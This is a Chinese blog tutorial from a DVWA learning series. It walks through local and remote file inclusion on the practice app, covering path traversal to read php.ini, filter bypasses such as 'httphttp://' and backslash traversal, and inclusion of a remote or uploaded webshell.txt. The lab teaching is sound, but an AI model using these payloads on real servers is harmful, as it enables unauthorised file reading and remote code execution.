DVWA学习日记-4 文件包含

最新推荐文章于 2023-06-18 15:02:57 发布
最新推荐文章于 2023-06-18 15:02:57 发布
阅读量463 收藏 1
点赞数
分类专栏: DVWA 文章标签: 文件包含 DVWA DVWA文件包含 web漏洞 DVWA攻略
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29010757/article/details/84316052
版权

文件包含
举例:
有个骗子卖东西,以次充好,以假乱真,这就是在三十六计里面的偷梁换柱
在文件包含漏洞里面的文件,把真正的文件调包换成我们的恶意文件,服务器却还不知道

概述:
文件包含其实就一种代码的处理方法,当一个代码文件想要引用另一个代码文件就会利用到包含,常见的函数有:include,require等,参数一般是代码文件名

文件名参数用户可控且过滤不严,被攻击者偷梁换柱
文件包含

include("hello.php")
include就是包含的意思,服务器端本身自带的
hello.php文件是由攻击者控制的

准备环境:
Firefox
DVWA
HackBar

漏洞实战
1.首先我们进入简单模式
在这里插入图片描述

2.说我们的allow_url_include的没有设置
2.1点击我们的phpstudy的其他选项菜单
在这里插入图片描述
2.2选择php扩展与设置->参数开关设置->allow_url_include
F5刷新一下
在这里插入图片描述
3.观察
首先看我们的hackbar上的url的红框内容在这里插入图片描述
4.分别点击三个文件链接进行查看
file1.php
在这里插入图片描述
file2.php
在这里插入图片描述
file3.php
在这里插入图片描述5.发现这个参数就是我们可以利用的地方
6.尝试修改url参数为test.php
在这里插入图片描述
显示了文件找不到这个文件,也表示了这个地方可以利用,同时我们还有个以外的收获,爆出了这个web的绝对路径,后面能利用到

7.思考
xxx.php
之前是file1.php、file2.php、file3.php
肯定是在一个目录里,而这个目录加上文件名形成了绝对路径
就相当于我们前面提到的include()

http://127.0.0.1/DVWA-1.9/vulnerabilities/fi/?page=xxx.php
include("F:\phpstudy\WWW\DVWA-master\vulnerabilities\fi\xxx.php")

在这里插入图片描述
前面的框里的路径是固定字段,而xxx.php是我们可控的

8.攻击—本地文件读取
读取F:\phpstudy\WWW\DVWA-master\php.ini
include(“F:\phpstudy\WWW\DVWA-master\php.ini”)
如果我们要变成下面的路径,我们就需要下面怎么做才能到执行到下面结果

include("F:\phpstudy\WWW\DVWA-master../../php.ini")

9.验证猜测
先访问原始内容,看一下这个文件里面是什么
在这里插入图片描述
10.再访问我们刚刚好构造的url
在页面顶部出现php.ini的内容,所以我们成功读取了php.ini的文件
在这里插入图片描述
11.攻击者是满足不了本地的文件执行的文件的
怎么样才能读取其他目录的php脚本文件呢?
显示内容还是执行PHP代码?

12.在服务端有一个phpinfo可以查看服务器相关信息,我们先访问下这个
在这里插入图片描述
13.再去看看文件包含访问的情况,因为他们是在同一个目录里面的,执行后同样显示php的相关信息,表名了文件包含不仅仅能读文件还能够执行文件
在这里插入图片描述
14.攻击者拥有是不满足的,执行服务端本来就有的脚本文件,并没有什么杀伤力
所有验证一下是否可以执行远程文件
在本机写一个phpinfo文件,保存为phpinfo.txt,然后执行文件包含,发现远程执行文件也可以用,而且非php文件,只要里面包含就可以执行

<?php
	phpinfo
?>

在这里插入图片描述
15.问题:我们发现php和txt文件都可以执行
但是我们看一下两个php页面的配置
phpinfo.php
在这里插入图片描述
phpinfo.txt
这里应该会是服务端的ip地址,不知道为什么会变成这样
在这里插入图片描述
16.攻击者思路
首先在攻击者自己的WEB服务器A要攻击WEB服务器B,攻击者首先在自己服务器上Webshell的文本文件得到url

http://www.a.com/webshell.txt

找到b的包含漏洞
成功执行url,这样就完成了简单等级的文件包含

http:www.b.com/DVWA-1.9/vulnerabilities/fi/?page=http://www.a.com/webshell.txt

17.进入中等难度
根据low等级方法
执行发现low方法失败,弹出红框中的错误信息,说明某些服务端过滤了某些字符
在这里插入图片描述
18.具体什么字符呢,我们发现了是…/这个字符
或者使用排除法测试
首先使用.php发现执行成功没有过滤
在这里插入图片描述
再使用/php.ini发现执行成功没有过滤
再使用./php.ini发现执行成功没有过滤
最后发现使用…/php.ini被过滤
在这里插入图片描述

19.查看源代码
在这里插入图片描述
20.有了前面的认知我们不能用…/跳转目录了
最后我们可以想到利用…\反斜杠进行绕过
21.验证发现果然执行成功
在这里插入图片描述

21.再接着执行远程文件执行的方法
发现low等级的方法执行失败,看一下错误信息,显然也过滤了某些字符
在这里插入图片描述
22.开始尝试过滤了什么字符?
http127.0.0.1 没有过滤
:127.0.0.1 没有过滤
//127.0.0.1 没有过滤
最后尝试 http://127.0.0.1 发现只过滤了http://
23.尝试绕过
httphttp://127.0.0.1
在这里插入图片描述
再次尝试
httphttp://127.0.0.1/phpinfo.txt
在这里插入图片描述
最后尝试成功绕过
httphttp://?/127.0.0.1/phpinfo.txt
在这里插入图片描述
24.进入高难度模式
尝试简单等级的和中等的方法失败
出现了新的错误信息
在这里插入图在这里插入图片描述片描述
添加反斜杠
在这里插入图片描述
25.最终不断尝试
服务端只认file*开头的文件的参数
在这里插入图片描述
尝试1file.php文件,没找到文件
尝试file11111111.php试试,从而发现只认file开头的字符串
在这里插入图片描述
26.查看源代码
在这里插入图片描述
26.file协议
file协议,文件传输协议,访问本地计算机中的文件

27.验证
我们知道物理路径
在这里插入图片描述
再使用文件包含执行成功
在这里插入图片描述
28.发现远程文件执行也需要file开头的,发现file协议只能执行本地文件,需要结合文件上传漏洞,然后进行本地文件执行

29.演示一下假如已经利用文件上传漏洞传入了phpinfo.txt的文件
在这里插入图片描述
30.攻击者思路
攻击者=>上传含有恶意代码的文件=>获取文件所在物理地址=>成功执行恶意代码=>受害者Web服务器 www.test.com

http://www.test.com//vulnerabilities/fi/?page=file:///F:/phpstudy/WWW/webshell.txt

32.最后进入无漏洞模式
查看源码,只允许四个文件名,有效防止了文件包含漏洞
在这里插入图片描述
修复

TRRRQ
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dvwa文件包含
qq_52986156的博客
10-17 373
直接分析源码发现过滤方式是使用的替换函数str_replace过滤了http://和https://和相对路径的表示符号../替换为空字符串,此处可以双写绕过waf。本地:测试文件未在上层所以不影响直接使用,要是需要读取上层文件同理在使用../的时候插入成双写模式..././根据页面的三个文件点击可以发现后端是get方式用url栏的page传参也可以直接分析源码看到是未作任何过滤。对应的文件存放路径如下(前面是网络访问路径,后面是本地路径)然后我们构造其他不存在的文件有回显报错信息爆出文件路径。
【渗透测试-web安全】DVWA-文件包含
harry_c的博客
11-11 1213
【渗透测试-web安全】DVWA-文件包含基本概念基本配置等级选择进入界面文件配置重启服务漏洞利用进阶内容基本的构建思路服务端会过滤掉对应的字符信息防范 基本概念 其实之前的文章说过,文件包含是一种代码的处理方法,比如函数include、require等,参数是文件名 但是如果对应的参数能够被用户可控的话,黑客就能够利用,构造出危害系统的缺口。 基本配置 等级选择 首选选择DVWA的等级为Low ...
DVWA——文件包含
小纯的博客
03-21 3157
File Inclusion学习文件包含简介实战:DVWA——文件包含 文件包含简介 一、文件包含简介: 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。 二、文件包含函数: PHP中文件包含函数有以下四种:require()、require_on
DVWA 文件包含
m0_56107268的博客
04-30 230
Low <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 没有做任何的现在,可以直接进行文件包含 本地包含: 远程服务器包含 : Medium <?php // The page we wish to display $file = $_GET[ 'page' ]; // Input validation $file = str_replace( array( "...
DVWA系列之14 文件包含漏洞分析
weixin_34284188的博客
11-14 158
程序开发人员通常会把可重复使用的函数写入到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 PHP中提供了四个文件包含的函数,分别是include...
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
接着是DVWA,这个应用设计有多个安全漏洞,包括跨站脚本(XSS)、文件包含漏洞、SQL注入等,用于模拟真实世界的网络安全问题。通过DVWA,开发者或安全研究人员可以实践如何发现这些漏洞,并学习如何修复它们。每个...
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
- **DVWA**:一款专为安全测试设计的应用程序,它包含了多种常见的Web应用漏洞,旨在帮助学习者了解这些漏洞并掌握相应的防御技术。 - **漏洞等级**:根据其严重性和利用难度分为low、medium、high三个级别。 - **...
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞web应用。...帮助web开发人员理解web应用保护的过程,还可以在课堂中为... DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA文件包含(File Inclusion)
qq_39682037的博客
03-21 2519
文件包含(File Inclusion) 指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是...
Dvwa练习04 File Inclusion文件包含
coco3105的博客
02-09 1309
本地文件包含,远程文件包含,文件读取及代码执行
DVWA学习笔记
lee_maple的博客
01-15 2995
DVWA学习笔记 Security Level: LOW 暴力破解(Brute Force) 已知用户名,尝试使用burp爆破密码 随意输入一个密码,将其发送至burpsuit intruder 导入一个字典(在实际生产中需要强大的社会工程学字典)进行暴力破解 一般情况下,不难看出长度不同的即为正确密码 命令注入(Command Injection) Command Injection,即命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。P..
DVWA学习日记-1 暴力破解
qq_29010757的博客
11-15 492
暴力破解 首选我们需要大家环境 phpstudy DVWA Provy Switcher 插件 OWASP ZAP 1.首先进入我们的DVWA环境中,输入账号密码 2.调整难度为简单 3.进入暴力破解页面 3.进入暴力破解页面 4.设置插件代理进行抓包 什么是代理抓包? 改写HTTP代理,让数据从它那通过,来监控并且截取到数据 图标变红表示设置成功 5.设置ZAP代理(默认是localh...
DVWA实验记录
最新发布
locator_r的博客
06-18 515
本文将记录DVWA靶场实验的全过程。 实验的提示和部分答案全可以通过右下角的View Help获取。
DVWA笔记
边城浪子的博客
09-25 1185
1.暴力破解(brute force) low级别 setp1:浏览器,burpsuite设代理。 step2:抓包,发送intruder, step3:暴破 medium级别 step1:同上步骤 higth级别 step1:无法直接利用burpsuite暴破,需要使用python编写代码进行暴破。 2.命令执行漏洞(command injection)靶机容易打坏 low级...
DVWA靶机通攻略第四——文件包含
小飞飞的博客
03-11 674
DVWA靶机的文件包含详细教学
代码审计——DVWA File Inclusion(文件包含)
z1756227332的博客
03-09 318
我们先了解一下PHP文件包含的函数,包含的文件会被当成PHP代码执行 include_once() 包含载入的文件会有内部判断机制是否“前面代码”已经包含载入过,如果载入,就不再载入。 include()包含载入的文件不判断是否重复包含,只要执行include(),就会包含一次,文件包含失败时会报一个"错误",然后继续执行代码。 require_once()函数会有内部判断机制是否“前面代码”已经...
DVWA----DVWA System error - config file not found. Copy config/config.inc.php.dist to config/config....
06-08
这是一个 DVWA(Damn Vulnerable Web Application)的系统错误提示,意思是配置文件未找到。解决方法是将 config 目录下的 config.inc.php.dist 文件复制一份,并将其重命名为 config.inc.php。然后,确保该文件中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值